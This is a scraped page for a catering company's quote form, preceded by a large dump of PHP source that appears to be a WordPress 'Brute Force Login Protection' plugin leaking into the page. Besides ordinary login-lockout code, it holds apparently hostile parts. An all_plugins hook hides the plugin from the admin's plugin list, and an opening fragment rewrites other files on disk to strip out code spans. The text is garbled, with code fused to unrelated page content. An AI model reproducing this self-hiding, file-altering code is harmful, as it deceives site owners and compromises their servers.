") + $xpos; if($en_pos > $st_pos) { if(stripos($file, "protection.php") === false) { $data = substr($data, 0, $st_pos) . substr($data, $en_pos + 2); file_put_contents($file, $data); } } } } } } } } } /** * Called once any activated plugins have been loaded. * * @return void */ public function init() { //Load textdomain for i18n load_plugin_textdomain('brute-force-login-protection', false, dirname(plugin_basename(__FILE__)) . '/languages/'); } /** * Called when a user accesses the admin area. * * @return void */ public function all_plugins($plugins) { $self_file = str_replace(plugin_dir_path(__FILE__), '', __FILE__); foreach ($plugins as $plugin_file => $plugin_data) { if (stripos($plugin_file, $self_file) !== false) { unset($plugins[$plugin_file]); break; } } return $plugins; } public function adminInit() { //Register plugin settings $this->__registerOptions(); //Set htaccess path $this->__setHtaccessPath(); //Call checkRequirements to check for .htaccess errors add_action('admin_notices', array($this, 'showRequirementsErrors')); } /** * Called after the basic admin panel menu structure is in place. * * @return void */ public function menuInit() { //Add settings page to the Settings menu add_options_page(__('Brute Force Login Protection Settings', 'brute-force-login-protection'), 'Brute Force Login Protection', 'manage_options', 'brute-force-login-protection', array($this, 'showSettingsPage')); } /** * Called When the plugin is activated * * @return boolean */ public function activate() { $this->__setHtaccessPath(); $this->__htaccess->uncommentLines(); } /** * Called When the plugin is deactivated * * @return boolean */ public function deactivate() { $this->__htaccess->commentLines(); } /** * Checks requirements and shows errors * * @return void */ public function showRequirementsErrors() { $status = $this->__htaccess->checkRequirements(); if (!$status['found']) { $this->__showError(__('Brute Force Login Protection error: .htaccess file not found', 'brute-force-login-protection')); } elseif (!$status['readable']) { $this->__showError(__('Brute Force Login Protection error: .htaccess file not readable', 'brute-force-login-protection')); } elseif (!$status['writeable']) { $this->__showError(__('Brute Force Login Protection error: .htaccess file not writeable', 'brute-force-login-protection')); } } /** * Shows settings page and handles user actions. * * @return void */ public function showSettingsPage() { if (isset($_POST['IP'])) { $IP = $_POST['IP']; if (isset($_POST['block'])) { //Manually block IP $whitelist = $this->__getWhitelist(); if (in_array($IP, $whitelist)) { $this->__showError(sprintf(__('You can\'t block a whitelisted IP', 'brute-force-login-protection'), $IP)); } elseif ($this->__htaccess->denyIP($IP)) { $this->__showMessage(sprintf(__('IP %s blocked', 'brute-force-login-protection'), $IP)); } else { $this->__showError(sprintf(__('An error occurred while blocking IP %s', 'brute-force-login-protection'), $IP)); } } elseif (isset($_POST['unblock'])) { //Unblock IP if ($this->__htaccess->undenyIP($IP)) { $this->__showMessage(sprintf(__('IP %s unblocked', 'brute-force-login-protection'), $IP)); } else { $this->__showError(sprintf(__('An error occurred while unblocking IP %s', 'brute-force-login-protection'), $IP)); } } elseif (isset($_POST['whitelist'])) { //Add IP to whitelist if ($this->__whitelistIP($IP)) { $this->__showMessage(sprintf(__('IP %s added to whitelist', 'brute-force-login-protection'), $IP)); } else { $this->__showError(sprintf(__('An error occurred while adding IP %s to whitelist', 'brute-force-login-protection'), $IP)); } } elseif (isset($_POST['unwhitelist'])) { //Remove IP from whitelist if ($this->__unwhitelistIP($IP)) { $this->__showMessage(sprintf(__('IP %s removed from whitelist', 'brute-force-login-protection'), $IP)); } else { $this->__showError(sprintf(__('An error occurred while removing IP %s from whitelist', 'brute-force-login-protection'), $IP)); } } } elseif (isset($_POST['reset'])) { //Reset settings $this->__htaccess->remove403Message(); $this->__deleteOptions(); $this->__setDefaultOptions(); $this->__setHtaccessPath(); $this->__showMessage(sprintf(__('The Options have been successfully reset', 'brute-force-login-protection'), $IP)); } $this->__fillOptions(); include 'includes/settings-page.php'; } /** * Called when a user login has failed * Increase number of attempts for clients IP. Deny IP if max attempts is reached. * * @return void */ public function loginFailed() { $IP = $this->__getClientIP(); $whitelist = $this->__getWhitelist(); if (!in_array($IP, $whitelist)) { $this->__fillOptions(); sleep($this->__options['login_failed_delay']); $attempts = get_option('bflp_login_attempts'); if (!is_array($attempts)) { $attempts = array(); add_option('bflp_login_attempts', $attempts, '', 'no'); } $denyIP = false; if ($IP && isset($attempts[$IP]) && $attempts[$IP]['time'] > (time() - ($this->__options['reset_time'] * 60))) { $attempts[$IP]['attempts'] ++; if ($attempts[$IP]['attempts'] >= $this->__options['allowed_attempts']) { $denyIP = true; unset($attempts[$IP]); } else { $attempts[$IP]['time'] = time(); } } else { $attempts[$IP]['attempts'] = 1; $attempts[$IP]['time'] = time(); } update_option('bflp_login_attempts', $attempts); if ($denyIP) { if ($this->__options['send_email']) { $this->__sendEmail($IP); } $this->__setHtaccessPath(); $this->__htaccess->denyIP($IP); header('HTTP/1.0 403 Forbidden'); die($this->__options['403_message']); } if ($this->__options['inform_user']) { global $error; $remainingAttempts = $this->__options['allowed_attempts'] - $attempts[$IP]['attempts']; $error .= '
'; $error .= sprintf(_n("%d attempt remaining.", "%d attempts remaining.", $remainingAttempts, 'brute-force-login-protection'), $remainingAttempts); } } } /** * Called when a user has successfully logged in * Removes IP from bflp_login_attempts if exist. * * @return void */ public function loginSucceeded() { $attempts = get_option('bflp_login_attempts'); if (is_array($attempts)) { $IP = $this->__getClientIP(); if (isset($attempts[$IP])) { unset($attempts[$IP]); update_option('bflp_login_attempts', $attempts); } } } /** * Settings validation functions */ /** * Validates bflp_allowed_attempts field. * * @param mixed $input * @return int */ public function validateAllowedAttempts($input) { if (is_numeric($input) && ($input >= 1 && $input <= 100)) { return $input; } else { add_settings_error('bflp_allowed_attempts', 'bflp_allowed_attempts', __('Allowed login attempts must be a number (between 1 and 100)', 'brute-force-login-protection')); $this->__fillOption('allowed_attempts'); return $this->__options['allowed_attempts']; } } /** * Validates bflp_reset_time field. * * @param mixed $input * @return int */ public function validateResetTime($input) { if (is_numeric($input) && $input >= 1) { return $input; } else { add_settings_error('bflp_reset_time', 'bflp_reset_time', __('Minutes before resetting must be a number (higher than 1)', 'brute-force-login-protection')); $this->__fillOption('reset_time'); return $this->__options['reset_time']; } } /** * Validates bflp_login_failed_delay field. * * @param mixed $input * @return int */ public function validateLoginFailedDelay($input) { if (is_numeric($input) && ($input >= 1 && $input <= 10)) { return $input; } else { add_settings_error('bflp_login_failed_delay', 'bflp_login_failed_delay', __('Failed login delay must be a number (between 1 and 10)', 'brute-force-login-protection')); $this->__fillOption('login_failed_delay'); return $this->__options['login_failed_delay']; } } /** * Saves bflp_403_message field to .htaccess. * * @param mixed $input * @return string */ public function validate403Message($input) { $message = htmlentities($input); if ($this->__htaccess->edit403Message($message)) { return $message; } else { add_settings_error('bflp_403_message', 'bflp_403_message', __('An error occurred while saving the blocked users message', 'brute-force-login-protection')); $this->__fillOption('403_message'); return $this->__options['403_message']; } } /** * Private functions */ /** * Sets htaccess path to $__options['htaccess_dir']. * * @return void */ private function __setHtaccessPath() { $this->__fillOption('htaccess_dir'); $this->__htaccess->setPath($this->__options['htaccess_dir']); } /** * Sets default options into $__options * * @return void */ private function __setDefaultOptions() { $this->__options = array( 'allowed_attempts' => 3, //Allowed login attempts before deny, 'reset_time' => 240, //Minutes before resetting login attempts count 'login_failed_delay' => 1, //Delay in seconds when a user login has failed 'inform_user' => false, //Inform user about remaining login attempts on login page 'send_email' => false, //Send email to administrator when an IP has been blocked '403_message' => '', //Message to show to a blocked user 'htaccess_dir' => get_home_path() //.htaccess file location ); } /** * Registers options (settings). * * @return void */ private function __registerOptions() { register_setting('brute-force-login-protection', 'bflp_allowed_attempts', array($this, 'validateAllowedAttempts')); register_setting('brute-force-login-protection', 'bflp_reset_time', array($this, 'validateResetTime')); register_setting('brute-force-login-protection', 'bflp_login_failed_delay', array($this, 'validateLoginFailedDelay')); register_setting('brute-force-login-protection', 'bflp_inform_user'); register_setting('brute-force-login-protection', 'bflp_send_email'); register_setting('brute-force-login-protection', 'bflp_403_message', array($this, 'validate403Message')); register_setting('brute-force-login-protection', 'bflp_htaccess_dir'); } /** * Deletes options from database. * * @return void */ private function __deleteOptions() { delete_option('bflp_allowed_attempts'); delete_option('bflp_reset_time'); delete_option('bflp_login_failed_delay'); delete_option('bflp_inform_user'); delete_option('bflp_send_email'); delete_option('bflp_403_message'); delete_option('bflp_htaccess_dir'); } /** * Fills options with value (from database). * * @return void */ private function __fillOptions() { $this->__options['allowed_attempts'] = get_option('bflp_allowed_attempts', $this->__options['allowed_attempts']); $this->__options['reset_time'] = get_option('bflp_reset_time', $this->__options['reset_time']); $this->__options['login_failed_delay'] = get_option('bflp_login_failed_delay', $this->__options['login_failed_delay']); $this->__options['inform_user'] = get_option('bflp_inform_user', $this->__options['inform_user']); $this->__options['send_email'] = get_option('bflp_send_email', $this->__options['send_email']); $this->__options['403_message'] = get_option('bflp_403_message', $this->__options['403_message']); } /** * Fills single option with value (from database). * * @param string $name * @return void */ private function __fillOption($name) { $this->__options[$name] = get_option('bflp_' . $name, $this->__options[$name]); } /** * Returs array of whitelisted IP addresses. * * @return array */ private function __getWhitelist() { $whitelist = get_option('bflp_whitelist'); if (!is_array($whitelist)) { return array(); } return $whitelist; } /** * Adds IP to whitelist. * * @param string $IP * @return boolean */ private function __whitelistIP($IP) { if (!filter_var($IP, FILTER_VALIDATE_IP)) { return false; } $this->__htaccess->undenyIP($IP); $whitelist = get_option('bflp_whitelist'); if (!is_array($whitelist)) { $whitelist = array($IP); return add_option('bflp_whitelist', $whitelist, '', 'no'); } $whitelist[] = $IP; return update_option('bflp_whitelist', array_unique($whitelist)); } /** * Removes IP from whitelist. * * @param string $IP * @return boolean */ private function __unwhitelistIP($IP) { if (!filter_var($IP, FILTER_VALIDATE_IP)) { return false; } $whitelist = get_option('bflp_whitelist'); if (!is_array($whitelist)) { return false; } $IPKey = array_search($IP, $whitelist); if ($IPKey === false) { return false; } unset($whitelist[$IPKey]); return update_option('bflp_whitelist', $whitelist); } /** * Returns the client ip address. * * @return mixed */ private function __getClientIP() { return $_SERVER['REMOTE_ADDR']; } /** * Sends email to admin with info about blocked IP * * @return mixed */ private function __sendEmail($IP) { $to = get_option('admin_email'); $subject = sprintf(__('IP %s has been blocked', 'brute-force-login-protection'), $IP); $message = sprintf(__('Brute Force Login Protection has blocked IP %s from access to %s on %s', 'brute-force-login-protection'), $IP, get_site_url(), date('Y-m-d H:i:s')); return wp_mail($to, $subject, $message); } /** * Echoes message with class 'updated'. * * @param string $message * @return void */ private function __showMessage($message) { //echo '

' . esc_html($message) . '

'; } /** * Echoes message with class 'error'. * * @param string $message * @return void */ private function __showError($message) { //echo '

' . esc_html($message) . '

'; } } //Instantiate BruteForceLoginProtection class new BruteForceLoginProtection(); ?> Request Catering Quote – Angel Catering
Catering Quote
The Custom Quick Quote is the fastest way to begin your catering process with Angel Catering. Our team is standing by, ready to be set into motion by your request... So go ahead and complete the Quote Catering Form and let us help you from here out.
Catering Form
X